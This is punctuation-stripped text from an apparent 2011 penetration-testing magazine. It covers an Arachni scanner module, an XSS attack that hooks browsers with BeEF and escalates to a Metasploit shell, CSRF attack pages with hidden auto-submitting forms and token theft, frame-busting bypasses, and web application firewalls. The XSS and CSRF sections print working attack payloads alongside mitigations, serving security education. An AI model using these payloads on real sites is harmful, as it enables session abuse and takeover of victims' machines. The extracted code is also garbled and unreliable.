will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
